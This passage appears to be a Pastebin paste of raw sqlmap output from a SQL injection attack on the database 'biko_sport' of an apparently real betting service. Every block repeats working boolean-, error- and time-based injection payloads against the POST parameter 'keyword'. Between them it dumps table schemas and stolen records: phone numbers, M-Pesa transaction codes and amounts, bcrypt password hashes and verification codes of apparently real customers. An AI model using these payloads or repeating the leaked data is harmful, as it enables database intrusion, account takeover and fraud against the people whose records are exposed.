  1416. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1417. ---
  1418. web application technology: PHP 5.6.33, Nginx
  1419. back-end DBMS: MySQL 5.0
  1420. Database: biko_sport
  1421. Table: bb
  1422. [12 columns]
  1423. +--------------+---------------+
  1424. | Column | Type |
  1425. +--------------+---------------+
  1426. | bet_amount | decimal(10,2) |
  1427. | bet_id | int(11) |
  1428. | bet_message | varchar(200) |
  1429. | created | datetime |
  1430. | created_by | varchar(70) |
  1431. | modified | datetime |
  1432. | possible_win | decimal(10,2) |
  1433. | profile_id | bigint(20) |
  1434. | reference | varchar(70) |
  1435. | status | smallint(1) |
  1436. | total_odd | decimal(10,2) |
  1437. | win | tinyint(1) |
  1438. +--------------+---------------+
  1439.  
  1440. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1441. ---
  1442. Place: POST
  1443. Parameter: keyword
  1444. Type: boolean-based blind
  1445. Title: AND boolean-based blind - WHERE or HAVING clause
  1446. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1447.  
  1448. Type: error-based
  1449. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1450. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1451.  
  1452. Type: AND/OR time-based blind
  1453. Title: MySQL > 5.0.11 AND time-based blind
  1454. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1455. ---
  1456. web application technology: PHP 5.6.33, Nginx
  1457. back-end DBMS: MySQL 5.0
  1458. Database: biko_sport
  1459. Table: mobile_app_profile
  1460. [9 columns]
  1461. +--------------+---------------------+
  1462. | Column | Type |
  1463. +--------------+---------------------+
  1464. | app | varchar(120) |
  1465. | date_created | datetime |
  1466. | device_id | varchar(200) |
  1467. | id | int(10) unsigned |
  1468. | modified | timestamp |
  1469. | msisdn | varchar(30) |
  1470. | profile_id | bigint(20) unsigned |
  1471. | status | int(11) |
  1472. | token_id | varchar(200) |
  1473. +--------------+---------------------+
  1474.  
  1475. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1476. ---
  1477. Place: POST
  1478. Parameter: keyword
  1479. Type: boolean-based blind
  1480. Title: AND boolean-based blind - WHERE or HAVING clause
  1481. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1482.  
  1483. Type: error-based
  1484. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1485. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1486.  
  1487. Type: AND/OR time-based blind
  1488. Title: MySQL > 5.0.11 AND time-based blind
  1489. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1490. ---
  1491. web application technology: PHP 5.6.33, Nginx
  1492. back-end DBMS: MySQL 5.0
  1493. Database: biko_sport
  1494. Table: mpesa_transaction
  1495. [14 columns]
  1496. +----------------------+---------------+
  1497. | Column | Type |
  1498. +----------------------+---------------+
  1499. | account_no | varchar(100) |
  1500. | business_number | int(8) |
  1501. | created | datetime |
  1502. | enc_params | varchar(250) |
  1503. | message | varchar(300) |
  1504. | modified | timestamp |
  1505. | mpesa_amt | decimal(53,2) |
  1506. | mpesa_code | varchar(100) |
  1507. | mpesa_customer_id | varchar(50) |
  1508. | mpesa_sender | varchar(100) |
  1509. | mpesa_transaction_id | bigint(20) |
  1510. | msisdn | bigint(20) |
  1511. | promo_code | varchar(50) |
  1512. | transaction_time | datetime |
  1513. +----------------------+---------------+
  1514.  
  1515. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1516. ---
  1517. Place: POST
  1518. Parameter: keyword
  1519. Type: boolean-based blind
  1520. Title: AND boolean-based blind - WHERE or HAVING clause
  1521. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1522.  
  1523. Type: error-based
  1524. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1525. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1526.  
  1527. Type: AND/OR time-based blind
  1528. Title: MySQL > 5.0.11 AND time-based blind
  1529. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1530. ---
  1531. web application technology: PHP 5.6.33, Nginx
  1532. back-end DBMS: MySQL 5.0
  1533. Database: biko_sport
  1534. Table: mpesa_transaction
  1535. [2 entries]
  1536. +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
  1537. | mpesa_customer_id | mpesa_transaction_id | msisdn | created | message | modified | mpesa_amt | promo_code | enc_params | mpesa_code | account_no | mpesa_sender | business_number | transaction_time |
  1538. +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
  1539. | +255756000915 | 5137 | 255756000915 | 2018-02-14 19:52:52 | 5BE8168ON1A | 2018-02-14 19:52:51 | 20000.00 | NULL | | 5BE8168ON1A | +255756000915 | | 7808353 | 2018-02-14 19:52:52 |
  1540. | 000 | 315 | 255758400696 | 2018-02-04 12:06:17 | 5B4715GE41B | 2018-02-04 12:06:17 | 500.00 | NULL | | 5B4715GE41B | 000 | | 5607720 | 2018-02-04 12:06:17 |
  1541. +-------------------+----------------------+--------------+---------------------+-------------+---------------------+-----------+------------+------------+-------------+---------------+--------------+-----------------+---------------------+
  1542.  
  1543. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1544. ---
  1545. Place: POST
  1546. Parameter: keyword
  1547. Type: boolean-based blind
  1548. Title: AND boolean-based blind - WHERE or HAVING clause
  1549. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1550.  
  1551. Type: error-based
  1552. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1553. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1554.  
  1555. Type: AND/OR time-based blind
  1556. Title: MySQL > 5.0.11 AND time-based blind
  1557. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1558. ---
  1559. web application technology: PHP 5.6.33, Nginx
  1560. back-end DBMS: MySQL 5.0
  1561. Database: biko_sport
  1562. Table: profile_balance
  1563. [7 columns]
  1564. +--------------------+---------------+
  1565. | Column | Type |
  1566. +--------------------+---------------+
  1567. | balance | decimal(10,2) |
  1568. | bonus_balance | decimal(10,2) |
  1569. | created | datetime |
  1570. | modified | timestamp |
  1571. | profile_balance_id | int(10) |
  1572. | profile_id | bigint(20) |
  1573. | transaction_id | bigint(20) |
  1574. +--------------------+---------------+
  1575.  
  1576. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1577. ---
  1578. Place: POST
  1579. Parameter: keyword
  1580. Type: boolean-based blind
  1581. Title: AND boolean-based blind - WHERE or HAVING clause
  1582. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1583.  
  1584. Type: error-based
  1585. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1586. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1587.  
  1588. Type: AND/OR time-based blind
  1589. Title: MySQL > 5.0.11 AND time-based blind
  1590. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1591. ---
  1592. web application technology: PHP 5.6.33, Nginx
  1593. back-end DBMS: MySQL 5.0
  1594. Database: biko_sport
  1595. Table: profile_setting
  1596. [10 columns]
  1597. +--------------------+---------------+
  1598. | Column | Type |
  1599. +--------------------+---------------+
  1600. | balance | decimal(10,2) |
  1601. | created | datetime |
  1602. | name | varchar(255) |
  1603. | password | text |
  1604. | profile_id | int(20) |
  1605. | profile_setting_id |
  1606. | reference_id | varchar(20) |
  1607. | status | int(1) |
  1608. | updated_at | timestamp |
  1609. | verification_code | int(11) |
  1610. +--------------------+---------------+
  1611.  
  1612. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1613. ---
  1614. Place: POST
  1615. Parameter: keyword
  1616. Type: boolean-based blind
  1617. Title: AND boolean-based blind - WHERE or HAVING clause
  1618. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1619.  
  1620. Type: error-based
  1621. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1622. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1623.  
  1624. Type: AND/OR time-based blind
  1625. Title: MySQL > 5.0.11 AND time-based blind
  1626. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1627. ---
  1628. web application technology: PHP 5.6.33, Nginx
  1629. back-end DBMS: MySQL 5.0
  1630. Database: biko_sport
  1631. Table: profile_settings
  1632. [14 columns]
  1633. +------------------------+---------------+
  1634. | Column | Type |
  1635. +------------------------+---------------+
  1636. | balance | bigint(20) |
  1637. | created_at | timestamp |
  1638. | max_daily_possible_win | decimal(10,2) |
  1639. | max_stake | decimal(10,2) |
  1640. | multibet_bet_max_stake | decimal(10,2) |
  1641. | name | varchar(250) |
  1642. | password | text |
  1643. | profile_id | bigint(20) |
  1644. | profile_setting_id | bigint(20) |
  1645. | reference_id | varchar(20) |
  1646. | single_bet_max_stake | decimal(10,2) |
  1647. | status | smallint(1) |
  1648. | updated_at | timestamp |
  1649. | verification_code | int(11) |
  1650. +------------------------+---------------+
  1651.  
  1652. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1653. ---
  1654. Place: POST
  1655. Parameter: keyword
  1656. Type: boolean-based blind
  1657. Title: AND boolean-based blind - WHERE or HAVING clause
  1658. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1659.  
  1660. Type: error-based
  1661. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1662. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1663.  
  1664. Type: AND/OR time-based blind
  1665. Title: MySQL > 5.0.11 AND time-based blind
  1666. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1667. ---
  1668. web application technology: PHP 5.6.33, Nginx
  1669. back-end DBMS: MySQL 5.0
  1670. Database: biko_sport
  1671. Table: profile_settings
  1672. [11 entries]
  1673. +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
  1674. | profile_id | reference_id | profile_setting_id | name | status | balance | password | max_stake | created_at | updated_at | verification_code | single_bet_max_stake | max_daily_possible_win | multibet_bet_max_stake |
  1675. +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
  1676. | 6 | | 7 | NULL | 1 | 0 | $2y$08$QmE3T0hoL2FMckF3eGxKa.SRpg/OzLlHLsC8dHMadpeXGCdmDqLpW | 0.00 | 2018-02-01 14:02:39 | 2018-02-06 00:37:27 | 3766 | 0.00 | 0.00 | 0.00 |
  1677. | 7 | | 5 | NULL | 1 | 0 | $2y$08$eTB0Umw5MzVLTTZaOWtSau/xZaFq4ZOdqJc3wdk.1dEISha0D.z3u | 0.00 | 2018-02-01 12:13:56 | 2018-02-01 12:15:36 | 2516 | 0.00 | 0.00 | 0.00 |
  1678. | 8 | DESKTOP | 3 | NULL | 1 | 0 | $2y$08$TWtoNzBGbmpNVU1laEdpeeiYg4Ig6GEu.ZeqsK78NS0NZbE/CTEza | 0.00 | 2018-01-31 03:34:07 | 2018-02-08 19:06:52 | 2270 | 0.00 | 0.00 | 0.00 |
  1679. | 9 | DESKTOP | 1129 | NULL | 1 | 0 | $2y$08$aXZZalVjNDFSL0J4dmlGZuJZZqFc8wSmH0SePTX3Q.x97gV8MVIyy | 0.00 | 2018-02-08 00:04:20 | 2018-02-08 00:04:40 | 1810 | 0.00 | 0.00 | 0.00 |
  1680. | 10 | DESKTOP | 138 | NULL | 1 | 0 | $2y$08$SWplQm5vanBzdUFjVktPV.XVoKmOjB.OdHZZPDKdPF1m6R2/Ahgwi | 0.00 | 2018-02-04 08:49:47 | 2018-02-11 17:34:40 | 3164 | 0.00 | 0.00 | 0.00 |
  1681. | 14 | | 8 | NULL | 1 | 0 | $2y$08$aUJkbXRlY0NnOG1aRUdGOOu6ibKFdsY9unrSvnLW6ObzeaKqeUEJ. | 0.00 | 2018-02-01 16:43:58 | 2018-02-01 16:44:35 | 9961 | 0.00 | 0.00 | 0.00 |
  1682. | 17 | DESKTOP | 1 | NULL | 0 | 0 | $2y$08$Z1NuQzN1cFduaTAxSVVPWeWPXHJAybuDcGayvkRWxTegtvKksWzPC | 0.00 | 2018-01-30 17:50:36 | 2018-01-30 17:50:36 | 1180 | 0.00 | 0.00 | 0.00 |
  1683. | 18 | | 9 | NULL | 1 | 0 | $2y$08$Y04zb2ZqNk1WZG5aaXFEUONme.ZoHkgcGMzM7SIzeMeuTbXFBt8pO | 0.00 | 2018-02-01 18:13:40 | 2018-02-01 18:14:48 | 2754 | 0.00 | 0.00 | 0.00 |
  1684. | 19 | DESKTOP | 4 | NULL | 1 | 0 | $2y$08$V2NEdjNxT3p1elp4N05aVuzXtE8ebQX4QB/trva5bag0.kgYXaU3m | 0.00 | 2018-01-31 15:30:46 | 2018-02-01 20:30:31 | 2075 | 0.00 | 0.00 | 0.00 |
  1685. | 20 | DESKTOP | 2 | NULL | 0 | 0 | $2y$08$RDVEQytaV1BYVFQ1aXFkM.6X0u6eyARqnOUTWry20VlYGjZ1n15/i | 0.00 | 2018-01-30 17:51:31 | 2018-01-30 17:51:31 | 1942 | 0.00 | 0.00 | 0.00 |
  1686. | 21 | DESKTOP | 13 | NULL | 1 | 0 | $2y$08$ZWpvaDRHdElaVGtiWUY0QuK0Jxvb7pmCKELX2CjwpVnUzlJL2.rw2 | 0.00 | 2018-02-02 14:11:32 | 2018-02-11 15:45:04 | 2993 | 0.00 | 0.00 | 0.00 |
  1687. +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
  1688.  
  1689. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1690. ---
  1691. Place: POST
  1692. Parameter: keyword
  1693. Type: boolean-based blind
  1694. Title: AND boolean-based blind - WHERE or HAVING clause
  1695. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1696.  
  1697. Type: error-based
  1698. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1699. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1700.  
  1701. Type: AND/OR time-based blind
  1702. Title: MySQL > 5.0.11 AND time-based blind
  1703. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1704. ---
  1705. web application technology: PHP 5.6.33, Nginx
  1706. back-end DBMS: MySQL 5.0
  1707. Database: biko_sport
  1708. Table: profile_setting
  1709. [0 entries]
  1710. +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
  1711. | profile_id | reference_id | profile_setting_id | name | status | created | balance | password | updated_at | verification_code |
  1712. +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
  1713. +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
  1714.  
  1715. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1716. ---
  1717. Place: POST
  1718. Parameter: keyword
  1719. Type: boolean-based blind
  1720. Title: AND boolean-based blind - WHERE or HAVING clause
  1721. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1722.  
  1723. Type: error-based
  1724. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1725. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1726.  
  1727. Type: AND/OR time-based blind
  1728. Title: MySQL > 5.0.11 AND time-based blind
  1729. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1730. ---
  1731. web application technology: PHP 5.6.33, Nginx
  1732. back-end DBMS: MySQL 5.0
  1733. Database: biko_sport
  1734. Table: backup_profile
  1735. [0 entries]
  1736. +------------+--------+--------+---------+---------+----------+------------+
  1737. | profile_id | status | msisdn | network | created | modified | created_by |
  1738. +------------+--------+--------+---------+---------+----------+------------+
  1739. +------------+--------+--------+---------+---------+----------+------------+
  1740.  
  1741. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1742. ---
  1743. Place: POST
  1744. Parameter: keyword
  1745. Type: boolean-based blind
  1746. Title: AND boolean-based blind - WHERE or HAVING clause
  1747. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1748.  
  1749. Type: error-based
  1750. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1751. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1752.  
  1753. Type: AND/OR time-based blind
  1754. Title: MySQL > 5.0.11 AND time-based blind
  1755. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1756. ---
  1757. web application technology: PHP 5.6.33, Nginx
  1758. back-end DBMS: MySQL 5.0
  1759. Database: biko_sport
  1760. Table: account_freeze
  1761. [5 columns]
  1762. +-------------------+-------------+
  1763. | Column | Type |
  1764. +-------------------+-------------+
  1765. | account_freeze_id | bigint(20) |
  1766. | created | datetime |
  1767. | modified | timestamp |
  1768. | msisdn | varchar(50) |
  1769. | status | tinyint(4) |
  1770. +-------------------+-------------+
  1771.  
  1772. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1773. ---
  1774. Place: POST
  1775. Parameter: keyword
  1776. Type: boolean-based blind
  1777. Title: AND boolean-based blind - WHERE or HAVING clause
  1778. Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
  1779.  
  1780. Type: error-based
  1781. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1782. Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
  1783.  
  1784. Type: AND/OR time-based blind
  1785. Title: MySQL > 5.0.11 AND time-based blind
  1786. Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
  1787. ---
  1788. web application technology: PHP 5.6.33, Nginx
  1789. back-end DBMS: MySQL 5.0
  1790. Database: biko_sport
  1791. Table: msi
  1792. [1 column]
  1793. +--------+------------+
  1794. | Column | Type |
  1795. +--------+------------+
  1796. | number | bigint(20) |
  1797. +--------+------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!